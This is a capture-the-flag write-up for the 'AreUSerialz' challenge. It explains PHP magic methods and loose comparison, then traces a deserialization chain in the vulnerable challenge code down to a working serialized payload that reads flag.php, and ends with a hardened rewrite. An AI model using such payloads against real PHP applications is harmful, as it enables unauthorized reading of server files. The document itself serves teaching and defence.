[WangDingBei 2020 Qinglong Group] AreUSerialz
2022-06-23 09:19:00 【K00sec】
Prerequisite knowledge
# PHP magic methods
__construct(): called when the object is initialized.
__construct() is the constructor. It is a special method of a class: when an object is instantiated with the `new` keyword, the constructor is called automatically.
## Example
```php
<?php
class Person {
    public $username;
    public function __construct($name){
        echo "Hello!".PHP_EOL;
        $this->username = $name;
    }
    public function getlogin(){
        echo "username:".$this->username.PHP_EOL;
    }
}
# Create an object; the code in __construct() runs first
$login = new Person('root');
$login->getlogin();
# Create another object; __construct() runs again
$login2 = new Person('admin');
?>
```
__destruct(): called when the object is destroyed.
__destruct() is called automatically by the engine when the object is destroyed, which happens:
1. when the PHP script finishes executing;
2. when unset() is called on the object;
3. when the variable holding the object is reassigned.
# PHP weak typing
`==`: when a string is compared with a number, the string is converted to a number first and then compared; a string that begins with digits is converted to that leading number. (The rules shown below are those of PHP 5 and 7; PHP 8 changed number-to-string comparison so that, for example, `0 == "bbb"` is false.)
# Comparing numbers with strings
```php
<?php
$a = 5;
$b = '5abcde';
# A number compared with a string that starts with the same number
var_dump($a == $b); //bool(true)
$b = '6teee';
# A number compared with a string that starts with a different number
var_dump($a == $b); //bool(false)

$a = 0;
$b = '1bb';
$c = 'bbb';
# 0 compared with a string that starts with a number
var_dump($a == $b); //bool(false)
# 0 compared with a string that does not start with a number (PHP 7: a non-numeric string converts to 0)
var_dump($a == $c); //bool(true)
```
# Comparing a number with a string that looks like scientific notation
## Comparing a number with a string of the form [0-9]e[0-9][a-z]*
```php
<?php
$a = 50; // int
$b = '5e1'; // string
var_dump($a == $b); // bool(true)
// '5e1bbb' is also read as scientific notation: the leading 5e1 = 5*10**1 is used and the trailing 'bbb' is ignored, so 50 == 5*10**1
$a = 50; // int
$b = '5e1bbb'; // string
var_dump($a == $b); // bool(true)
```
# md5 weak comparison
```php
<?php
$a = 's878926199a';
$b = 's155964671a';
// Both hashes start with "0e" followed only by digits, so == reads them as 0*10**n and they compare equal
var_dump(md5($a) == md5($b)); // bool(true)
var_dump(md5($a)); //string(32) "0e545993274517709034328855841020"
var_dump(md5($b)); //string(32) "0e342768416822451524974117254469"
```
## md5 with an array argument
md5() cannot hash an array: in PHP 7 it returns NULL (with a warning) for both arrays, so the two NULL return values compare equal.
```php
<?php
$a[0] = 1;
$b[0] = 1;
var_dump(md5($a)); // NULL
var_dump(md5($a) == md5($b)); // bool(true)
// Error reported: md5() expects a string but was given an array: Warning: md5() expects parameter 1 to be string, array given in /box/script.php on line 4
?>
```
The challenge source, with comments added to make the analysis easier:
```php
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
    protected $op;
    protected $filename;
    protected $content;
    // Magic method 1: __construct() runs when an object is created with new
    function __construct() {
        # Initial values (note: these assign local variables, not $this->op etc.)
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process(); # call process()
    }
    // __construct() is called after the object is created; __destruct() when it is destroyed
    public function process() {
        if($this->op == "1") {
            # Weak comparison of op with "1": if equal, call write()
            $this->write();
        } else if($this->op == "2") {
            # If op == "2" (weak comparison), call read() and print the result with output()
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!"); # op is neither "1" nor "2"
        }
    }
    // write(): if both filename and content are set, write content to the named file; otherwise output Failed
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
    // read(): if filename is set, return the contents of that file
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    // Magic method 2: __destruct() runs automatically when the object is destroyed (reassignment, end of script, unset())
    function __destruct() {
        if($this->op === "2") # strict comparison of op with "2"
            $this->op = "1"; # reset op to "1"
        $this->content = ""; # clear content
        $this->process(); # call process()
    }
}
# Checks every byte of the input: returns false if any character is outside printable ASCII 32..125
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
## Main program
if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str); # deserialization
    }
}
```
Start the analysis from the read() method. It matters because it contains file_get_contents(), which reads the file named by $this->filename and returns its contents in $res.
```php
private function read() {
    $res = "";
    if(isset($this->filename)) {
        $res = file_get_contents($this->filename); # can be used to read the contents of flag.php
    }
    return $res;
}
```
Working upwards, the call site of read() is in process(). process() compares op weakly: as long as op == "2", read() is called and the file named by filename is read.
```php
public function process() {
    if($this->op == "1") {
        $this->write();
    } else if($this->op == "2") {
        # If op == "2" (weak comparison), call read() and print the result with output()
        $res = $this->read();
        $this->output($res);
    } else {
        $this->output("Bad Hacker!");
    }
}
```
Going up one more level, two methods call process(): __construct() and __destruct().
## __construct
```php
function __construct() {
    $op = "1";
    $filename = "/tmp/tmpfile";
    $content = "Hello World!";
    $this->process(); # call process()
}
```
## __destruct
```php
function __destruct() {
    # I have wrapped the body of the if in braces to make clear which statement runs when the condition is true.
    if($this->op === "2"){
        $this->op = "1";
    }
    $this->content = "";
    $this->process(); # call process()
}
```
This is the final position. __construct() can be ignored: unserialize() does not call the constructor, so after deserialization the first method that runs is __destruct(), when the object is destroyed.
__destruct() first compares op strictly with "2"; if it matches, op is reset to "1".
Then content is cleared and process() is called.
# Payload construction ideas
__destruct() ===> op !== "2" is enough (the strict check must not match)
process() ===> op == "2" is enough to call read()
op = 2 (the integer) fails the strict check in __destruct(), so op is not reset; process() then matches the else-if condition with the weak comparison and finally calls read().
Environment used to construct the payload:
```php
<?php
class FileHandler {
    public $op=2;
    public $filename='flag.php';
    public $content;
}
$a = new FileHandler();
var_dump(serialize($a));
?>
```
At first I built the payload with protected properties, as in the source, but found it could not be used. After reading other analyses I understood the reason: a protected property serializes as \0*\0name, and the two NUL bytes (ord 0 < 32) fail is_valid(); since PHP 7.1 unserialize() ignores the declared visibility, so the modified code above with public properties is used to construct the payload.
# Payload that does not work (\0 marks a NUL byte, which the browser does not display; s:5 is the length of "\0*\0op")
```
?str=O:11:"FileHandler":3:{s:5:"\0*\0op";i:2;s:11:"\0*\0filename";s:8:"flag.php";s:10:"\0*\0content";N;}
```
# Payload that works
```
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
```
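As an added example that is not part of the challenge or this write-up, the same handler with the two root causes closed: every op comparison is strict, file access is confined to /tmp, there is no destructor, and unserialize() is called with allowed_classes => false so user input can never become a FileHandler. It assumes PHP >= 7.0, Linux-style paths, and a hypothetical setOp() method.

```php
<?php
// Added example, not code from the challenge or the write-up: the same handler
// with the root causes closed. Assumes PHP >= 7.0 and Linux-style paths.
class FileHandler {
    protected $op = "1";
    protected $filename = "/tmp/tmpfile";   // constructed default
    protected $content = "";
    public function setOp($op) {
        // Normalise to string once, then compare strictly everywhere, so the
        // integer 2 can no longer pass a weak "== 2" check in one place while
        // failing a strict "=== 2" check in another.
        $this->op = (string)$op;
    }
    public function process() {
        if ($this->op === "1") {
            $this->output("write path omitted in this example");
        } elseif ($this->op === "2") {
            $this->output($this->read());
        } else {
            $this->output("Bad Hacker!");
        }
    }
    private function read() {
        // realpath() collapses "../" and symlinks, so the resolved file must
        // really live under /tmp; "flag.php" or "../etc/passwd" are rejected.
        $real = realpath($this->filename);
        if ($real === false || strpos($real, "/tmp/") !== 0) {
            return "";
        }
        return file_get_contents($real);
    }
    private function output($s) { echo "[Result]: <br>", $s, "\n"; }
    // No __destruct(): no file operation runs as a side effect of teardown.
}
// Deserialise user input only as scalars/arrays. allowed_classes=false turns
// every "O:" token into __PHP_Incomplete_Class, whose magic methods never run.
function load_request($str) {
    $data = @unserialize($str, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}
// The write-up's public-property payload yields no FileHandler object at all,
// so neither process() nor any destructor is reachable from the request.
$payload = 'O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}';
if (load_request($payload) === null) {
    echo "rejected: request did not deserialize to an array\n";
}
```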